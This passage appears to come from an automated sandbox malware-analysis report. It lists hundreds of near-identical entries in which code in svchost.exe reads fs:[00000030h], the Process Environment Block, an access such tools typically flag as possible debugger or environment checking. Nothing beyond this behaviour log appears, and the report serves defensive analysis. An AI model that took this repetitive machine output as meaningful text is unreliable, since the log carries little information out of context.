                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]1_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A6C7 mov eax, dword ptr fs:[00000030h]1_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037666B0 mov eax, dword ptr fs:[00000030h]1_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C6A6 mov eax, dword ptr fs:[00000030h]1_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]1_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]1_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]1_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]1_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6500 mov eax, dword ptr fs:[00000030h]1_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037325E0 mov eax, dword ptr fs:[00000030h]1_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]1_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]1_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037365D0 mov eax, dword ptr fs:[00000030h]1_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]1_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]1_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]1_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]1_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]1_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]1_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E59C mov eax, dword ptr fs:[00000030h]1_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732582 mov eax, dword ptr fs:[00000030h]1_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732582 mov ecx, dword ptr fs:[00000030h]1_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764588 mov eax, dword ptr fs:[00000030h]1_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC460 mov ecx, dword ptr fs:[00000030h]1_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA456 mov eax, dword ptr fs:[00000030h]1_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372645D mov eax, dword ptr fs:[00000030h]1_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375245A mov eax, dword ptr fs:[00000030h]1_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A430 mov eax, dword ptr fs:[00000030h]1_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C427 mov eax, dword ptr fs:[00000030h]1_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037304E5 mov ecx, dword ptr fs:[00000030h]1_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037644B0 mov ecx, dword ptr fs:[00000030h]1_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BA4B0 mov eax, dword ptr fs:[00000030h]1_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037364AB mov eax, dword ptr fs:[00000030h]1_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA49A mov eax, dword ptr fs:[00000030h]1_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372CB7E mov eax, dword ptr fs:[00000030h]1_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEB50 mov eax, dword ptr fs:[00000030h]1_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]1_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]1_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]1_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]1_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FAB40 mov eax, dword ptr fs:[00000030h]1_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D8B42 mov eax, dword ptr fs:[00000030h]1_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]1_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]1_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]1_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]1_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804B00 mov eax, dword ptr fs:[00000030h]1_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EBFC mov eax, dword ptr fs:[00000030h]1_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BCBF0 mov eax, dword ptr fs:[00000030h]1_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEBD0 mov eax, dword ptr fs:[00000030h]1_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]1_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]1_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]1_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]1_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804A80 mov eax, dword ptr fs:[00000030h]1_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]1_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]1_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEA60 mov eax, dword ptr fs:[00000030h]1_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]1_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]1_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]1_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]1_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA38 mov eax, dword ptr fs:[00000030h]1_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA24 mov eax, dword ptr fs:[00000030h]1_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EA2E mov eax, dword ptr fs:[00000030h]1_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BCA11 mov eax, dword ptr fs:[00000030h]1_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]1_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]1_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730AD0 mov eax, dword ptr fs:[00000030h]1_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]1_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]1_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]1_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]1_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786AA4 mov eax, dword ptr fs:[00000030h]1_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768A90 mov edx, dword ptr fs:[00000030h]1_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]1_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]1_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC97C mov eax, dword ptr fs:[00000030h]1_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]1_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov edx, dword ptr fs:[00000030h]1_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]1_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0946 mov eax, dword ptr fs:[00000030h]1_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B892A mov eax, dword ptr fs:[00000030h]1_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C892B mov eax, dword ptr fs:[00000030h]1_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC912 mov eax, dword ptr fs:[00000030h]1_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]1_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]1_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]1_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]1_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]1_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]1_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE9E0 mov eax, dword ptr fs:[00000030h]1_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037649D0 mov eax, dword ptr fs:[00000030h]1_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA9D3 mov eax, dword ptr fs:[00000030h]1_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C69C0 mov eax, dword ptr fs:[00000030h]1_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804940 mov eax, dword ptr fs:[00000030h]1_2_03804940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov esi, dword ptr fs:[00000030h]1_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]1_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]1_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]1_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]1_2_037309AD
